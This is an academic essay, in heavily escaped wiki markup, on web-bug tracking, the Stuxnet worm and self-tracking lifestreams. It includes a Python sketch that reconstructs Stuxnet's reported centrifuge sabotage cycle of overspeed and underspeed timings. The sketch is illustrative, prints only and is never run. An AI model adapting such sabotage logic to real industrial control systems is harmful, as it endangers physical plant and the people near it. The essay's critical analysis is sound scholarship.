*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it was ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid attracting too much unwanted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). One can also see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
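&lt;br /&gt;
The mechanism at issue is trivially simple, which makes the industry's reluctance all the more telling. Here is a minimal sketch of expressing the preference with Python's standard library (the URL is a placeholder): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Minimal sketch: the 'do not track' preference is a single HTTP header.
# Whether any given tracker honours it is another matter entirely.
import urllib.request

req = urllib.request.Request('http://www.example.com/',  # placeholder URL
                             headers={'DNT': '1'})  # 1 = opt out of tracking
with urllib.request.urlopen(req) as response:
    print(response.status)  # the response arrives regardless: DNT is advisory
&amp;lt;/pre&amp;gt; &lt;br /&gt;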
&lt;br /&gt;
One of the newer, and perhaps indicative, directions of travel for these web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims to keep 'an eye on 1091622 websites'; it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of Americans said they would 'not be okay' with being tracked (because it would be an invasion of privacy)… Only 23 percent said they'd be 'okay' with tracking (because it would lead to better and more personalized search results)…Despite all those high-percentage objections to the idea of being tracked, less than half of the people surveyed -- 38 percent -- said they knew of ways to control the data collected about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are just not aware of the subterranean depths of their computational devices, and the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device whilst giving the impression that the user remains fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This issue is helpfully illustrated by the next case study, of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found a host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name ‘Stuxnet’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’: the first part, 'stu', comes from the (.stub) file; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, such as a test facility modelling a nuclear plant, to create and launch (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection, covering its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise the fact that it is gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals, so that an infected system does not exhibit abnormal behaviour and therefore does not raise an alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the act of sabotage, and in a targeted way, through the fatiguing of the motors; this looks like standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable the warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general-purpose attack, but is designed to unload its digital warheads only under specific conditions, against a specific target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
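&lt;br /&gt;
The logic of the attack sequence Zetter describes can be summarised schematically. The following is a simplified sketch based only on the frequencies and intervals reported above; it is a reconstruction for illustration, not the worm's actual code, which was written for Siemens programmable logic controllers rather than in Python. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Schematic reconstruction of the attack cycle reported by Zetter (2011).
# Illustrative only: the real payload ran on Siemens S7 PLCs, and also
# replayed recorded sensor data to operators (the man-in-the-middle element).
import time

NOMINAL_HZ = 1064     # normal operating frequency of the IR-1 centrifuges
OVERSPEED_HZ = 1410   # close to the rotors' mechanical limit
UNDERSPEED_HZ = 2     # near-standstill, stressing rotors as they spin back up
TWENTY_SEVEN_DAYS = 27 * 24 * 60 * 60

def set_frequency(hz):
    # Stand-in for the command sent to the frequency converters.
    print('frequency converters set to %d Hz' % hz)

def attack_cycle():
    while True:
        time.sleep(TWENTY_SEVEN_DAYS)   # lie dormant between attacks
        set_frequency(OVERSPEED_HZ)     # first sequence: overspeed...
        time.sleep(15 * 60)             # ...for roughly fifteen minutes
        set_frequency(NOMINAL_HZ)       # restore normality, hiding the damage
        time.sleep(TWENTY_SEVEN_DAYS)   # another 27 days pass
        set_frequency(UNDERSPEED_HZ)    # second sequence: near-standstill...
        time.sleep(50 * 60)             # ...for fifty minutes
        set_frequency(NOMINAL_HZ)       # ...and back; faults surface much later

# attack_cycle()  # not called here; shown for structure only
&amp;lt;/pre&amp;gt; &lt;br /&gt;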
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm suggest that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known to the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach of its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did’ (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely, using a number of software-based markers that give away the physical identity of the location. Indeed, the ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage control systems from physical systems, providing a stealth infection of the computer system that would fool the operators of the plant (the ‘man-in-the-middle attack’ described above). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of the rotors, leading to cracks and failures; the larger, 417, manipulated valves in the centrifuges and faked industrial process control sensor signals by modelling the centrifuges, which were grouped into cascades of 164 (Langner, 2011). Indeed, Langner (2011) evocatively described this as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This analysis was a close reading and reconstruction of the programming logic, taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what it was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel was involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see Table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan -&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open, it is relatively trivial to decode it and learn, in a very short time, techniques that would otherwise have taken many years to develop. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one whose purpose is linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increasing ability of code and software, via computational devices, to covertly monitor, control and mediate, both positively and negatively, is not just a matter of interventions designed to deceive the human and non-human actors that make up these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, that forms part of the notion of lifestreams, and more particularly of the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
These developments in web bugs and worms connect with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have grown in recent years as ‘real-time streams’ platforms such as Twitter and Facebook have expanded. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online which, although it remains notionally private, is stored and accessed by corporations that wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea developed by David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), who described them as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, with its short, text-message-sized 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect his own data systematically; as he explains, he started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &lt;br /&gt;
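&lt;br /&gt;
The data structure Freeman and Gelernter describe is simple to sketch: a single time-ordered list of documents, plus a handful of operators over it. The following minimal sketch, in Python, is for illustration only; the field names are invented, and only two of the operators are shown. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Minimal sketch of a lifestream: one time-ordered list of documents,
# with 'store' and 'substream' as examples of the operators quoted above.
import time

stream = []  # the lifestream; the tail holds the past, the head the future

def store(kind, content, when=None):
    # 'Transparently store information': everything goes into one stream.
    stream.append({'time': when or time.time(), 'kind': kind, 'content': content})
    stream.sort(key=lambda doc: doc['time'])

def substream(predicate):
    # 'Organize information on demand': a substream is just a filtered view.
    return [doc for doc in stream if predicate(doc)]

store('mail', 'Note from Eric')
store('todo', 'Finish chapter', when=time.time() + 86400)  # a future document

reminders = substream(lambda doc: doc['kind'] == 'todo')
print(reminders)
&amp;lt;/pre&amp;gt; &lt;br /&gt;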
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensor circuitry that is common in smartphones, to log GPS location, direction of travel, and so forth. This is when lifestreaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed, as the sketch after the following definition shows: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
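A concrete rendering helps here: the ‘Geraldine posted a photo to her album’ example maps onto a JSON object along the following lines. This is a sketch in the style of the JSON Activity Streams 1.0 specification; the identifiers and URLs are invented. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Sketch of 'Geraldine posted a photo to her album' as an Activity
# Streams 1.0 style object (actor, verb, object, target); ids are invented.
import json

activity = {
    'published': '2011-02-10T15:04:55Z',
    'actor': {'objectType': 'person',
              'id': 'urn:example:person:geraldine',
              'displayName': 'Geraldine'},
    'verb': 'post',
    'object': {'objectType': 'photo',
               'id': 'urn:example:photo:9268',
               'url': 'http://example.org/geraldine/photos/9268'},
    'target': {'objectType': 'photo-album',
               'id': 'urn:example:album:53',
               'displayName': "Geraldine's Photo Album"},
}
print(json.dumps(activity, indent=2))
&amp;lt;/pre&amp;gt; &lt;br /&gt;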
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case, in other words for the individual user (or lifestreamer) as much as for the organization (such as Facebook), the key is to pattern-match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class of others.[13] &lt;br /&gt;
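&lt;br /&gt;
Here is a minimal sketch of the kind of comparison against a personal norm that such systems perform; the readings are invented, and real systems also compare against populations and historical baselines. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Sketch: finding the day that deviates most from a user's own norm.
# The step counts are invented data for illustration.
import statistics

daily_steps = [8200, 7900, 8500, 8100, 1200, 8300, 7800]  # one anomalous day

mean = statistics.mean(daily_steps)
sd = statistics.stdev(daily_steps)

# Score each day by its distance from the personal baseline (z-score),
# then surface the most unusual one, as a dashboard or nudge might.
zscores = [(abs((steps - mean) / sd), day)
           for day, steps in enumerate(daily_steps)]
worst_z, worst_day = max(zscores)
print('most unusual day: %d (z = %.1f)' % (worst_day, worst_z))
&amp;lt;/pre&amp;gt; &lt;br /&gt;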
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but it also offers a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally amounts to the construction of a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligoptica (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narrative, providing a stabilising web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now lifestreaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time, whilst secreting themselves within our computer systems, raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs, in many ways, are lifestreams, albeit lifestreams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: passive in the sense of lying under the surface, relatively benign and silent; aggressive in their hoarding of data, monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of compactness as conciseness in expression. The etymology, from the Latin for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation are often offloaded to the ‘cloud’: server computers designed specifically for the task and accessed via networks. Indeed, many viruses often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative relation to a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard, in what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series-structured streams of real-time data, often organised as lists. Therefore the past (as stored data), the present (as current data collection, or processed archival data), and the future (as both the ethical addressee of the system and a potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst it draws on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
